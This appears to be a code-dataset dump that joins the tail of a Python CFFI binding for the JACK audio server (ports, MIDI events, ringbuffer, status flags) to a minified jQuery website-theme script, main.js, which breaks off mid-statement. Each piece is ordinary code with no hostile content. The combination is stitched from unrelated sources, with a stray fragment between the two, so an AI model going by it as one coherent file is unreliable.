return self._hasflag(_lib.JackPortIsTerminal)
def request_monitor(self, onoff):
"""Set input monitoring.
If `can_monitor` is ``True``, turn input monitoring on or
off. Otherwise, do nothing.
Parameters
----------
onoff : bool
If ``True``, switch monitoring on; if ``False``, switch it
off.
"""
_check(_lib.jack_port_request_monitor(self._ptr, onoff),
'Unable to switch monitoring on/off')
def _hasflag(self, flag):
"""Helper method for is_*()."""
return bool(_lib.jack_port_flags(self._ptr) & flag)
class MidiPort(Port):
"""A JACK MIDI port.
This class is derived from `Port` and has exactly the same
attributes and methods.
This class cannot be instantiated directly (see `Port`).
New JACK audio/MIDI ports can be created with the
:meth:`~Ports.register` method of `Client.inports`,
`Client.outports`, `Client.midi_inports` and `Client.midi_outports`.
See Also
--------
Port, OwnMidiPort
"""
is_audio = property(lambda self: False, doc='This is always ``False``.')
is_midi = property(lambda self: True, doc='This is always ``True``.')
class OwnPort(Port):
"""A JACK audio port owned by a `Client`.
This class is derived from `Port`. `OwnPort` objects can do
everything that `Port` objects can, plus a lot more.
This class cannot be instantiated directly (see `Port`).
New JACK audio/MIDI ports can be created with the
:meth:`~Ports.register` method of `Client.inports`,
`Client.outports`, `Client.midi_inports` and `Client.midi_outports`.
"""
def __init__(self, port_ptr, client):
Port.__init__(self, port_ptr)
self._client = client
@property
def number_of_connections(self):
"""Number of connections to or from port."""
return _lib.jack_port_connected(self._ptr)
@property
def connections(self):
"""List of ports which the port is connected to."""
names = _ffi.gc(_lib.jack_port_get_connections(self._ptr),
_lib.jack_free)
return self._client._port_list_from_pointers(names)
def is_connected_to(self, port):
"""Am I *directly* connected to *port*?
Parameters
----------
port : str or Port
Full port name or port object.
"""
if isinstance(port, Port):
port = port.name
return bool(_lib.jack_port_connected_to(self._ptr, port.encode()))
def connect(self, port):
"""Connect to given port.
Parameters
----------
port : str or Port
Full port name or port object.
See Also
--------
Client.connect
"""
if not isinstance(port, Port):
port = self._client.get_port_by_name(port)
if self.is_output:
source = self
if not port.is_input:
raise ValueError('Input port expected')
destination = port
elif self.is_input:
destination = self
if not port.is_output:
raise ValueError('Output port expected')
source = port
else:
assert False
self._client.connect(source.name, destination.name)
def disconnect(self, other=None):
"""Disconnect this port.
Parameters
----------
other : str or Port
Port to disconnect from.
By default, disconnect from all connected ports.
"""
if other is None:
_check(_lib.jack_port_disconnect(self._client._ptr, self._ptr),
'Error disconnecting {0!r}'.format(self.name))
else:
if self.is_output:
args = self, other
elif self.is_input:
args = other, self
self._client.disconnect(*args)
def unregister(self):
"""Unregister port.
Remove the port from the client, disconnecting any existing
connections. This also removes the port from
`Client.inports`, `Client.outports`, `Client.midi_inports` or
`Client.midi_outports`.
"""
if self.is_audio:
listname = ''
elif self.is_midi:
listname = 'midi_'
if self.is_input:
listname += 'inports'
elif self.is_output:
listname += 'outports'
ports = getattr(self._client, listname)
ports._portlist.remove(self)
_check(_lib.jack_port_unregister(self._client._ptr, self._ptr),
'Error unregistering {0!r}'.format(self.name))
def get_buffer(self):
"""Get buffer for audio data.
This returns a buffer holding the memory area associated with
the specified port. For an output port, it will be a memory
area that can be written to; for an input port, it will be an
area containing the data from the port's connection(s), or
zero-filled. If there are multiple inbound connections, the
data will be mixed appropriately.
Caching output ports is DEPRECATED in JACK 2.0, due to some new
optimization (like "pipelining"). Port buffers have to be
retrieved in each callback for proper functioning.
This method shall only be called from within the process
callback (see `Client.set_process_callback()`).
"""
blocksize = self._client.blocksize
return _ffi.buffer(_lib.jack_port_get_buffer(self._ptr, blocksize),
blocksize * _ffi.sizeof('float'))
def get_array(self):
"""Get audio buffer as NumPy array.
Make sure to ``import numpy`` before calling this, otherwise the
first call might take a long time.
This method shall only be called from within the process
callback (see `Client.set_process_callback()`).
See Also
--------
get_buffer
"""
import numpy as np
return np.frombuffer(self.get_buffer(), dtype=np.float32)
class OwnMidiPort(MidiPort, OwnPort):
"""A JACK MIDI port owned by a `Client`.
This class is derived from `OwnPort` and `MidiPort`, which are
themselves derived from `Port`. It has the same attributes and
methods as `OwnPort`, but `get_buffer()` and `get_array()` are
disabled. Instead, it has methods for sending and receiving MIDI
events (to be used only from within the process callback -- see
`Client.set_process_callback()`).
This class cannot be instantiated directly (see `Port`).
New JACK audio/MIDI ports can be created with the
:meth:`~Ports.register` method of `Client.inports`,
`Client.outports`, `Client.midi_inports` and `Client.midi_outports`.
"""
def __init__(self, *args, **kwargs):
OwnPort.__init__(self, *args, **kwargs)
self._event = _ffi.new('jack_midi_event_t*')
def get_buffer(self):
"""Not available for MIDI ports."""
raise NotImplementedError('get_buffer() not available on MIDI ports')
def get_array(self):
"""Not available for MIDI ports."""
raise NotImplementedError('get_array() not available on MIDI ports')
@property
def max_event_size(self):
"""Get the size of the largest event that can be stored by the port.
This returns the current space available, taking into
account events already stored in the port.
"""
return _lib.jack_midi_max_event_size(
_lib.jack_port_get_buffer(self._ptr, self._client.blocksize))
@property
def lost_midi_events(self):
"""Get the number of events that could not be written to the port.
This being a non-zero value implies that the port is full.
Currently the only way this can happen is if events are lost on
port mixdown.
"""
return _lib.jack_midi_get_lost_event_count(
_lib.jack_port_get_buffer(self._ptr, self._client.blocksize))
def incoming_midi_events(self):
"""Return generator for incoming MIDI events.
JACK MIDI is normalised, the MIDI events yielded by this
generator are guaranteed to be complete MIDI events (the status
byte will always be present, and no realtime events will be
interspersed with the events).
Yields
------
time : int
Time (in samples) relative to the beginning of the current
audio block.
event : buffer
The actual MIDI event data.
"""
event = self._event
buf = _lib.jack_port_get_buffer(self._ptr, self._client.blocksize)
for i in range(_lib.jack_midi_get_event_count(buf)):
err = _lib.jack_midi_event_get(event, buf, i)
# TODO: proper error handling if this ever happens:
assert not err, err
yield event.time, _ffi.buffer(event.buffer, event.size)
def clear_buffer(self):
"""Clear an event buffer.
This should be called at the beginning of each process cycle
before calling `reserve_midi_event()` or `write_midi_event()`.
This function may not be called on an input port.
"""
_lib.jack_midi_clear_buffer(
_lib.jack_port_get_buffer(self._ptr, self._client.blocksize))
def write_midi_event(self, time, event):
"""Create an outgoing MIDI event.
Clients must write normalised MIDI data to the port - no running
status and no (one-byte) realtime messages interspersed with
other messages (realtime messages are fine when they occur on
their own, like other messages).
Events must be written in order, sorted by their sample offsets.
JACK will not sort the events for you, and will refuse to store
out-of-order events.
Parameters
----------
time : int
Time (in samples) relative to the beginning of the current
audio block.
event : bytes or buffer or sequence of int
The actual MIDI event data.
.. note:: Buffer objects are only supported for CFFI >= 0.9.
Raises
------
JackError
If MIDI event couldn't be written.
"""
try:
event = _ffi.from_buffer(event)
except AttributeError:
pass # from_buffer() not supported
except TypeError:
pass # input is not a buffer
_check(_lib.jack_midi_event_write(
_lib.jack_port_get_buffer(self._ptr, self._client.blocksize),
time, event, len(event)), 'Error writing MIDI event')
def reserve_midi_event(self, time, size):
"""Get a buffer where an outgoing MIDI event can be written to.
Clients must write normalised MIDI data to the port - no running
status and no (one-byte) realtime messages interspersed with
other messages (realtime messages are fine when they occur on
their own, like other messages).
Events must be written in order, sorted by their sample offsets.
JACK will not sort the events for you, and will refuse to store
out-of-order events.
Parameters
----------
time : int
Time (in samples) relative to the beginning of the current
audio block.
size : int
Number of bytes to reserve.
Returns
-------
buffer
A buffer object where MIDI data bytes can be written to.
If no space could be reserved, an empty buffer is returned.
"""
buf = _lib.jack_midi_event_reserve(
_lib.jack_port_get_buffer(self._ptr, self._client.blocksize),
time, size)
return _ffi.buffer(buf, size if buf else 0)
class Ports(object):
"""A list of input/output ports.
This class is not meant to be instantiated directly. It is only
used as `Client.inports`, `Client.outports`, `Client.midi_inports`
and `Client.midi_outports`.
The ports can be accessed by indexing or by iteration.
New ports can be added with `register()`, existing ports can be
removed by calling their :meth:`~OwnPort.unregister` method.
"""
def __init__(self, client, porttype, flag):
self._client = client
self._type = porttype
self._flag = flag
self._portlist = []
def __len__(self):
return self._portlist.__len__()
def __getitem__(self, name):
return self._portlist.__getitem__(name)
# No __setitem__!
def __iter__(self):
return self._portlist.__iter__()
def __repr__(self):
return self._portlist.__repr__()
def register(self, shortname, is_terminal=False, is_physical=False):
"""Create a new input/output port.
The new `OwnPort` or `OwnMidiPort` object is automatically added
to `Client.inports`, `Client.outports`, `Client.midi_inports` or
`Client.midi_outports`.
Parameters
----------
shortname : str
Each port has a short name. The port's full name contains
the name of the client concatenated with a colon (:)
followed by its short name. The `port_name_size()` is the
maximum length of this full name. Exceeding that will cause
the port registration to fail.
The port name must be unique among all ports owned by this
client.
If the name is not unique, the registration will fail.
is_terminal : bool
For an input port: If ``True``, the data received by the
port will not be passed on or made available at any other
port.
For an output port: If ``True``, the data available at the
port does not originate from any other port
Audio synthesizers, I/O hardware interface clients, HDR
systems are examples of clients that would set this flag for
their ports.
is_physical : bool
If ``True`` the port corresponds to some kind of physical
I/O connector.
Returns
-------
Port
A new `OwnPort` or `OwnMidiPort` instance.
"""
port = self._client._register_port(
shortname, self._type, is_terminal, is_physical, self._flag)
self._portlist.append(port)
return port
def clear(self):
"""Unregister all ports in the list.
See Also
--------
OwnPort.unregister
"""
while self._portlist:
self._portlist[0].unregister()
class RingBuffer(object):
"""JACK's lock-free ringbuffer."""
def __init__(self, size):
"""Create a lock-free ringbuffer.
A ringbuffer is a good way to pass data between threads
(e.g. between the main program and the process callback),
when streaming realtime data to slower media, like audio file
playback or recording.
The key attribute of a ringbuffer is that it can be safely
accessed by two threads simultaneously -- one reading from the
buffer and the other writing to it -- without using any
synchronization or mutual exclusion primitives. For this to
work correctly, there can only be a single reader and a single
writer thread. Their identities cannot be interchanged.
Parameters
----------
size : int
Size in bytes. JACK will allocate a buffer of at least this
size (rounded up to the next power of 2), but one byte is
reserved for internal use. Use `write_space` to
determine the actual size available for writing.
"""
ptr = _lib.jack_ringbuffer_create(size)
if not ptr:
raise JackError('Could not create RingBuffer')
self._ptr = _ffi.gc(ptr, _lib.jack_ringbuffer_free)
@property
def write_space(self):
"""The number of bytes available for writing."""
return _lib.jack_ringbuffer_write_space(self._ptr)
def write(self, data):
"""Write data into the ringbuffer.
Parameters
----------
data : buffer or bytes or iterable of int
Bytes to be written to the ringbuffer.
Returns
-------
int
The number of bytes written, which could be less than the
length of *data* if there was no more space left
(see `write_space`).
See Also
--------
:attr:`write_space`, :attr:`write_buffers`
"""
try:
data = _ffi.from_buffer(data)
except AttributeError:
pass # from_buffer() not supported
except TypeError:
pass # input is not a buffer
return _lib.jack_ringbuffer_write(self._ptr, data, len(data))
@property
def write_buffers(self):
"""Contains two buffer objects that can be written to directly.
Two are needed because the space available for writing may be
split across the end of the ringbuffer. Either of them could be
0 length.
This can be used as a no-copy version of `write()`.
When finished with writing, `write_advance()` should be used.
.. note:: After an operation that changes the write pointer
(`write()`, `write_advance()`, `reset()`), the buffers are no
longer valid and one should use this property again to get
new ones.
"""
vectors = _ffi.new('jack_ringbuffer_data_t[2]')
_lib.jack_ringbuffer_get_write_vector(self._ptr, vectors)
return (
_ffi.buffer(vectors[0].buf, vectors[0].len),
_ffi.buffer(vectors[1].buf, vectors[1].len)
)
def write_advance(self, size):
"""Advance the write pointer.
After data has been written to the ringbuffer using
`write_buffers`, use this method to advance the buffer pointer,
making the data available for future read operations.
Parameters
----------
size : int
The number of bytes to advance.
"""
_lib.jack_ringbuffer_write_advance(self._ptr, size)
@property
def read_space(self):
"""The number of bytes available for reading."""
return _lib.jack_ringbuffer_read_space(self._ptr)
def read(self, size):
"""Read data from the ringbuffer.
Parameters
----------
size : int
Number of bytes to read.
Returns
-------
buffer
A buffer object containing the requested data.
If no more data is left (see `read_space`), a smaller
(or even empty) buffer is returned.
See Also
--------
peek, :attr:`read_space`, :attr:`read_buffers`
"""
data = _ffi.new('unsigned char[]', size)
size = _lib.jack_ringbuffer_read(self._ptr, data, size)
return _ffi.buffer(data, size)
def peek(self, size):
"""Peek at data from the ringbuffer.
Opposed to `read()` this function does not move the read
pointer. Thus it's a convenient way to inspect data in the
ringbuffer in a continuous fashion.
The price is that the data is copied into a newly allocated
buffer. For "raw" non-copy inspection of the data in the
ringbuffer use `read_buffers`.
Parameters
----------
size : int
Number of bytes to peek.
Returns
-------
buffer
A buffer object containing the requested data.
If no more data is left (see `read_space`), a smaller
(or even empty) buffer is returned.
See Also
--------
read, :attr:`read_space`, :attr:`read_buffers`
"""
data = _ffi.new('unsigned char[]', size)
size = _lib.jack_ringbuffer_peek(self._ptr, data, size)
return _ffi.buffer(data, size)
@property
def read_buffers(self):
"""Contains two buffer objects that can be read directly.
Two are needed because the data to be read may be split across
the end of the ringbuffer. Either of them could be 0 length.
This can be used as a no-copy version of `peek()` or `read()`.
When finished with reading, `read_advance()` should be used.
.. note:: After an operation that changes the read pointer
(`read()`, `read_advance()`, `reset()`), the buffers are no
longer valid and one should use this property again to get
new ones.
"""
vectors = _ffi.new('jack_ringbuffer_data_t[2]')
_lib.jack_ringbuffer_get_read_vector(self._ptr, vectors)
return (
_ffi.buffer(vectors[0].buf, vectors[0].len),
_ffi.buffer(vectors[1].buf, vectors[1].len)
)
def read_advance(self, size):
"""Advance the read pointer.
After data has been read from the ringbuffer using
`read_buffers` or `peek()`, use this method to advance the
buffer pointers, making that space available for future write
operations.
Parameters
----------
size : int
The number of bytes to advance.
"""
_lib.jack_ringbuffer_read_advance(self._ptr, size)
def mlock(self):
"""Lock a ringbuffer data block into memory.
Uses the ``mlock()`` system call. This prevents the
ringbuffer's memory from being paged to the swap area.
.. note:: This is not a realtime operation.
"""
_check(_lib.jack_ringbuffer_mlock(self._ptr),
'Error mlocking the RingBuffer data')
def reset(self, size=None):
"""Reset the read and write pointers, making an empty buffer.
.. note:: This is not thread safe.
Parameters
----------
size : int, optional
The new size for the ringbuffer.
Must be less than allocated size.
"""
if size is None:
_lib.jack_ringbuffer_reset(self._ptr)
else:
_lib.jack_ringbuffer_reset_size(self._ptr, size)
@property
def size(self):
"""The number of bytes in total used by the buffer.
See Also
--------
:attr:`read_space`, :attr:`write_space`
"""
return self._ptr.size
class Status(object):
"""Representation of the JACK status bits."""
__slots__ = '_code'
def __init__(self, code):
self._code = code
def __repr__(self):
flags = ', '.join(name for name in dir(self)
if not name.startswith('_') and getattr(self, name))
if not flags:
flags = 'no flags set'
return '<jack.Status 0x{0:X}: {1}>'.format(self._code, flags)
@property
def failure(self):
"""Overall operation failed."""
return self._hasflag(_lib.JackFailure)
@property
def invalid_option(self):
"""The operation contained an invalid or unsupported option."""
return self._hasflag(_lib.JackInvalidOption)
@property
def name_not_unique(self):
"""The desired client name was not unique.
With the *use_exact_name* option of `Client`, this situation is
fatal. Otherwise, the name is modified by appending a dash and
a two-digit number in the range "-01" to "-99". `Client.name`
will return the exact string that was used. If the specified
*name* plus these extra characters would be too long, the open
fails instead.
"""
return self._hasflag(_lib.JackNameNotUnique)
@property
def server_started(self):
"""The JACK server was started for this `Client`.
Otherwise, it was running already.
"""
return self._hasflag(_lib.JackServerStarted)
@property
def server_failed(self):
"""Unable to connect to the JACK server."""
return self._hasflag(_lib.JackServerFailed)
@property
def server_error(self):
"""Communication error with the JACK server."""
return self._hasflag(_lib.JackServerError)
@property
def no_such_client(self):
"""Requested client does not exist."""
return self._hasflag(_lib.JackNoSuchClient)
@property
def load_failure(self):
"""Unable to load internal client."""
return self._hasflag(_lib.JackLoadFailure)
@property
def init_failure(self):
"""Unable to initialize client."""
return self._hasflag(_lib.JackInitFailure)
@property
def shm_failure(self):
"""Unable to access shared memory."""
return self._hasflag(_lib.JackShmFailure)
@property
def version_error(self):
"""Client's protocol version does not match."""
return self._hasflag(_lib.JackVersionError)
@property
def backend_error(self):
"""Backend error."""
return self._hasflag(_lib.JackBackendError)
@property
def client_zombie(self):
"""Client zombified failure."""
return self._hasflag(_lib.JackClientZombie)
def _hasflag(self, flag):
"""Helper function for Status properties."""
return bool(self._code & flag)
class TransportState(object):
"""Representation of the JACK transport state.
See Also
--------
`Client.transport_state`, :meth:`Client.transport_query`
"""
__slots__ = '_code'
def __init__(self, code):
self._code = code
def __eq__(self, other):
return self._code == other
def __repr__(self):
return 'jack.' + {
_lib.JackTransportStopped: 'STOPPED',
_lib.JackTransportRolling: 'ROLLING',
_lib.JackTransportStarting: 'STARTING',
_lib.JackTransportNetStarting: 'NETSTARTING',
}[self._code]
class JackError(Exception):
"""Exception for all kinds of JACK-related errors."""
pass
class CallbackExit(Exception):
"""To be raised in a callback function to signal failure.
See Also
--------
:meth:`Client.set_process_callback`
:meth:`Client.set_blocksize_callback`
:meth:`Client.set_samplerate_callback`
:meth:`Client.set_port_rename_callback`
:meth:`Client.set_graph_order_callback`
:meth:`Client.set_xrun_callback`
"""
pass
def position2dict(pos):
"""Convert CFFI position struct to a dict."""
assert pos.unique_1 == pos.unique_2
keys = ['usecs', 'frame_rate', 'frame']
if pos.valid & _lib.JackPositionBBT:
keys += ['bar', 'beat', 'tick', 'bar_start_tick', 'beats_per_bar',
'beat_type', 'ticks_per_beat', 'beats_per_minute']
if pos.valid & _lib.JackPositionTimecode:
keys += ['frame_time', 'next_time']
if pos.valid & _lib.JackBBTFrameOffset:
keys += ['bbt_offset']
if pos.valid & _lib.JackAudioVideoRatio:
keys += ['audio_frames_per_video_frame']
if pos.valid & _lib.JackVideoFrameOffset:
keys += ['video_offset']
return dict((k, getattr(pos, k)) for k in keys)
def version():
"""Get tuple of major/minor/micro/protocol version."""
v = _ffi.new('int[4]')
_lib.jack_get_version(v+0, v+1, v+2, v+3)
return tuple(v)
def version_string():
"""Get human-readable JACK version."""
return _ffi.string(_lib.jack_get_version_string()).decode()
def client_name_size():
"""Return the maximum number of characters in a JACK client name.
This includes the final NULL character. This value is a constant.
"""
return _lib.jack_client_name_size()
def port_name_size():
"""Maximum length of port names.
The maximum number of characters in a full JACK port name including
the final NULL character. This value is a constant.
A port's full name contains the owning client name concatenated with
a colon (:) followed by its short name and a NULL character.
"""
return _lib.jack_port_name_size()
def set_error_function(callback=None):
"""Set the callback for error message display.
Set it to ``None`` to restore the default error callback function
(which prints the error message plus a newline to stderr).
The *callback* function must have this signature::
callback(message: str) -> None
"""
_set_error_or_info_function(callback, _lib.jack_set_error_function)
def set_info_function(callback=None):
"""Set the callback for info message display.
Set it to ``None`` to restore default info callback function
(which prints the info message plus a newline to stderr).
The *callback* function must have this signature::
callback(message: str) -> None
"""
_set_error_or_info_function(callback, _lib.jack_set_info_function)
def client_pid(name):
"""Return PID of a JACK client.
Parameters
----------
name : str
Name of the JACK client whose PID shall be returned.
Returns
-------
int
PID of *name*. If not available, 0 will be returned.
"""
return _lib.jack_get_client_pid(name.encode())
def _set_error_or_info_function(callback, setter):
"""Helper for set_error_function() and set_info_function()."""
if callback is None:
callback_wrapper = _ffi.NULL
else:
@_ffi.callback('void (*)(const char*)')
def callback_wrapper(msg):
callback(_ffi.string(msg).decode())
_keepalive[setter] = callback_wrapper
setter(callback_wrapper)
_keepalive = {}
def _check(error_code, msg):
"""Check error code and raise JackError if non-zero."""
if error_code:
raise JackError('{0} ({1})'.format(msg, error_code)) | err = _lib.jack_client_close(self._ptr)
self._ptr = _ffi.NULL
if not ignore_errors:
_check(err, 'Error closing JACK client') |
main.js | !function(t){"use strict";function e(){t(".local-video-container").find(".btn-play").on("click",function(){t(this).siblings(".image-holder").css("z-index",-1),t(this).css("opacity",0),t(this).siblings("video").get(0).play()})}function a(){window.sr=ScrollReveal();var t="section:not(.masonry):not(:first-of-type):not(.parallax):not(.bg-dark):not(.image-square)",e=1e3;window.sr.reveal(""+t,{viewFactor:.1,duration:""+e,scale:1,mobile:!1})}function i(){var e=t(".image-holder, .parallax");e.each(function(){t(this).attr("data-background")&&t(this).css("background-image","url("+t(this).data("background")+")")})}function n(){function e(){var t=h;if(0>=t)return s&&(s=!1,a.removeClass("fixed")),o&&(o=!1,a.removeClass("nav-hidden")),void(n&&(n=!1,a.removeClass("scrolled")));if(t>i){if(!n)return a.addClass("scrolled"),void(n=!0)}else t>i-200?(s||(a.addClass("fixed"),s=!0),t>i-100?o||(a.addClass("nav-hidden"),o=!0):o&&(o=!1,a.removeClass("nav-hidden"))):(s&&(s=!1,a.removeClass("fixed")),o&&(o=!1,a.removeClass("nav-hidden"))),n&&(n=!1,a.removeClass("scrolled"))}var a=t("body .nav-container nav:first"),i=(t("body .nav-container nav:first").outerHeight(),t("body section:nth-of-type(1)").first().outerHeight(!0)),n=!1,s=!1,o=!1;t("nav").hasClass("fixed")||t("nav").hasClass("absolute")||(t(".nav-container").css("min-height",t("nav").outerHeight(!0)),t(window).resize(function(){t(".nav-container").css("min-height",t("nav").outerHeight(!0))})),t("nav").hasClass("bg-dark")&&t(".nav-container").addClass("bg-dark"),window.pageYOffset>i&&t("nav").addClass("fixed").addClass("nav-hidden"),window.addEventListener("scroll",e,!1),t(".menu > li > ul").each(function(){var e=t(this).offset(),a=e.left+t(this).outerWidth(!0);if(a>t(window).width()&&!t(this).hasClass("mega-menu"))t(this).addClass("make-right");else if(a>t(window).width()&&t(this).hasClass("mega-menu")){var i=t(window).width()-e.left,n=t(this).outerWidth(!0)-i;t(this).css("margin-left",-n)}}),t(".mobile-toggle").on("click",function(){t(".nav-bar").toggleClass("nav-open"),t(this).toggleClass("active")}),t(".menu li").on("click",function(e){e||(e=window.event),e.stopPropagation(),t(this).find("ul").length?t(this).toggleClass("toggle-sub"):t(this).parents(".toggle-sub").removeClass("toggle-sub")}),t(".nav-block.nav-widget").on("click",function(){t(this).toggleClass("toggle-widget")}),t(".search-form input, .search-form button").on("click",function(t){t||(t=window.event),t.stopPropagation()}),t(".search-widget").on("click",function(e){t(".search-popup").fadeIn(),t(".search-popup input").focus(),t(".search-popup").on("click",function(e){t(".search-popup").fadeOut()}),e.preventDefault()}),t(".offscreen-toggle").on("click",function(){t(".nav-bar").toggleClass("exit"),t(".offscreen-cont").fadeToggle(),t(".offscreen-cont").toggleClass("nav-is-open")}),t(".offscreen-toggle").length&&addEventListener("scroll",function(){t(".offscreen-cont").hasClass("nav-is-open")&&(t(".nav-bar").toggleClass("exit"),t(".offscreen-cont").fadeToggle(),t(".offscreen-cont").toggleClass("nav-is-open"))},!1)}function s(){t(".gallery").magnificPopup({tLoading:"",gallery:{enabled:!0},mainClass:"mfp-fade"}),t(".magnific, .lightbox").magnificPopup({tLoading:""})}function o(){t(".tabbed-content").each(function(){t("li",this).eq(0).hasClass("active")&&t("li",this).eq(2).hasClass("active")&&t("li",this).eq(3).hasClass("active")&&t("li",this).eq(4).hasClass("active")||t("li",this).eq(0).addClass("active"),t(this).append('<ul class="content"></ul>')}),t(".tabs li").each(function(){var e=t(this),a="";e.is(".tabs>li:first-child")&&(a=' class="active"');var i=e.find(".tab-content").detach().wrap("<li"+a+"></li>").parent();e.closest(".tabbed-content").find(".content").append(i)}),t(".tabs li").on("click",function(){t(this).closest(".tabs").find("li").removeClass("active"),t(this).addClass("active");var e=t(this).index()+1;t(this).closest(".tabbed-content").find(".content>li").removeClass("active"),t(this).closest(".tabbed-content").find(".content>li:nth-of-type("+e+")").addClass("active")})}function l(){var e=[];t(".slider").each(function(){var e=t(this);if(e.find(".slides").length)return!0;var a=[];e.find(">*").length;e.children().each(function(e){a.push(t(this).wrap("li").parent())}),t('<ul class="slides"></ul>').append(a).appendTo(e)}),t(".slider").each(function(a){var i=t(this),n=t(this).find("ul.slides"),s=1,o=!1,l=!1,r=7e3,d=!1,c="fade",f=!0;o="true"==i.attr("data-arrows")?!0:!1,f="false"==i.attr("data-autoplay")?!1:!0,l="true"==i.attr("data-pagination")&&n.find("li").length>1?!0:!1,i.attr("data-timing")&&(r=i.attr("data-timing")),i.attr("data-items")&&(s=i.attr("data-items")),i.attr("data-animation")&&(c=i.attr("data-animation")),n.find("li").length>1&&(d=!0),n.addClass("owl-carousel"),e.push(n),e[a].owlCarousel({animateIn:!1,animateOut:!1,nav:o,dots:l,dotsSpeed:500,navSpeed:500,items:s,autoplay:f,autoplayTimeout:r,navText:!1,loop:d,mouseDrag:!0,responsive:{0:{items:1,nav:!1},768:{items:s}}})})}function r(){var e=t(".chartbox-bar-progress");e.length&&(t(window).width()>=768?e.eq(0).waypoint(function(){e.each(function(){var e=t(this);e.width(e.data("progress"))})},{offset:"95%"}):e.each(function(){var e=t(this);e.width(e.data("progress"))}))}function d(){p||t(".parallax").jarallax({speed:.2})}function c(){t(".tweets-feed").each(function(e){t(this).attr("id","tweets-"+e)}).each(function(e){function a(t){for(var a=t.length,i=0,n=document.getElementById("tweets-"+e),s='<ul class="slides">';a>i;)s+="<li>"+t[i]+"</li>",i++;return s+="</ul>",n.innerHTML=s,s}var i={id:t("#tweets-"+e).attr("data-widget-id"),dotId:"",maxTweets:t("#tweets-"+e).attr("data-amount"),enableLinks:!0,showUser:!0,showTime:!0,dateFunction:"",showRetweet:!1,customCallback:a};twitterFetcher.fetch(i)})}function f(){var e=t("html, body"),a=t(".local-scroll, .scroll-nav > li > a");a.on("click",function(a){var i=t.attr(this,"href"),n=0;return n="#go"===i?t("section:nth-of-type(2)").offset().top:n=t(i).offset().top,e.animate({scrollTop:n},1e3,"easeInCubic"),!1})}function u(){if(!p){var e=t(".counter");e.length&&e.counterUp({delay:10,time:800})}}var p;p=/Android|webOS|iPhone|iPad|iPod|BlackBerry/i.test(navigator.userAgent)?!0:!1;var h=0,g=!1;t(window).load(function(){t('[class*="transition-"]').addClass("transition-active"),t(".loader").addClass("loader-fade"),t(".masonry").each(function(){var e=t(this).find(".masonry-container");g=e,e.on("layoutComplete",function(){e.addClass("masonry-active")}),e.isotope({itemSelector:".masonry-item",masonry:{columnWidth:".masonry-item"}})}),t(".masonry-filters li").on("click",function(){var e=t(this),a=e.closest(".masonry").find(".masonry-container"),i="*";"*"!==e.attr("data-masonry-filter")&&(i=".filter-"+e.attr("data-masonry-filter")),t(".masonry-filters li").removeClass("active"),e.addClass("active"),a.removeClass("masonry-animate"),a.isotope({filter:i})})}),t(document).ready(function(){var p=!0,g=!0;if(addEventListener("scroll",function(){h=window.pageYOffset},!1),i(),p&&(t("ul.slides li").hasClass("parallax")?t("ul.slides").on("initialized.owl.carousel",function(){d()}):d()),g&&a(),l(),f(),e(),n(),s(),o(),r(),c(),u(),t(".masonry").each(function(){var e,a=t(this),i=a.find(".masonry-container"),n=a.find(".masonry-filters"),s="undefined"!=typeof n.attr("data-filter-all-text")?n.attr("data-filter-all-text"):"All";i.find(".masonry-item[data-masonry-filter]").length&&(n.append("<ul></ul>"),e=n.find("> ul"),e.append('<li class="active" data-masonry-filter="*">'+s+"</li>"),i.find(".masonry-item[data-masonry-filter]").each(function(){var a=t(this),i=a.attr("data-masonry-filter"),n=[];"undefined"!=typeof i&&""!==i&&(n=i.split(",")),jQuery(n).each(function(t,i){a.addClass("filter-"+i),e.find('[data-masonry-filter="'+i+'"]').length||e.append('<li data-masonry-filter="'+i+'">'+i+"</li>")})}))}),t('a:not(.lightbox):not(.gallery):not([href^="#"]):not([href^="tel"]):not([href^="mailto"]):not([href=""]):not([target="_blank"])').on("click",function(){t('[class*="transition-"]').removeClass("transition-active")}),document.querySelector("[data-maps-api-key]")&&!document.querySelector(".gMapsAPI")&&t("[data-maps-api-key]").length){var m=document.createElement("script"),v=t("[data-maps-api-key]:first").attr("data-maps-api-key");m.type="text/javascript",m.src="https://maps.googleapis.com/maps/api/js?key="+v+"&callback=initGoogleMaps",m.className="gMapsAPI",document.body.appendChild(m)}}),window.initGoogleMaps=function(){"undefined"!=typeof google&&"undefined"!=typeof google.maps&&t(".map-canvas[data-maps-api-key]").each(function(){var e,a,i,n=this,s="undefined"!=typeof t(this).attr("data-map-style")?t(this).attr("data-map-style"):!1,o=JSON.parse(s)||[{featureType:"landscape",stylers:[{saturation:-100},{lightness:65},{visibility:"on"}]},{featureType:"poi",stylers:[{saturation:-100},{lightness:51},{visibility:"simplified"}]},{featureType:"road.highway",stylers:[{saturation:-100},{visibility:"simplified"}]},{featureType:"road.arterial",stylers:[{saturation:-100},{lightness:30},{visibility:"on"}]},{featureType:"road.local",stylers:[{saturation:-100},{lightness:40},{visibility:"on"}]},{featureType:"transit",stylers:[{saturation:-100},{visibility:"simplified"}]},{featureType:"administrative.province",stylers:[{visibility:"off"}]},{featureType:"water",elementType:"labels",stylers:[{visibility:"on"},{lightness:-25},{saturation:-100}]},{featureType:"water",elementType:"geometry",stylers:[{hue:"#ffff00"},{lightness:-25},{saturation:-97}]}],l="undefined"!=typeof t(this).attr("data-map-zoom")&&""!==t(this).attr("data-map-zoom")?1*t(this).attr("data-map-zoom"):17,r="undefined"!=typeof t(this).attr("data-latlong")?t(this).attr("data-latlong"):!1,d=r?1*r.substr(0,r.indexOf(",")):!1,c=r?1*r.substr(r.indexOf(",")+1):!1,f=new google.maps.Geocoder,u="undefined"!=typeof t(this).attr("data-address")?t(this).attr("data-address").split(";"):!1,p="We Are Here",h=t(document).width()>766?!0:!1,g={draggable:h,scrollwheel:!0,zoom:l,disableDefaultUI:!0,styles:o};void 0!=t(this).attr("data-marker-title")&&""!=t(this).attr("data-marker-title")&&(p=t(this).attr("data-marker-title")),void 0!=u&&""!=u[0]?f.geocode({address:u[0].replace("[nomarker]","")},function(t,e){if(e==google.maps.GeocoderStatus.OK){var a=new google.maps.Map(n,g);a.setCenter(t[0].geometry.location),u.forEach(function(t){var e;if(i={url:void 0==window.mr_variant?"images/logotype/location.png":"../images/location.png",size:new google.maps.Size(30,48),scaledSize:new google.maps.Size(30,48)},/(\-?\d+(\.\d+)?),\s*(\-?\d+(\.\d+)?)/.test(t))var n=t.split(","),s=new google.maps.Marker({position:{lat:1*n[0],lng:1*n[1]},map:a,icon:i,title:p,optimised:!1});else t.indexOf("[nomarker]")<0&&(e=new 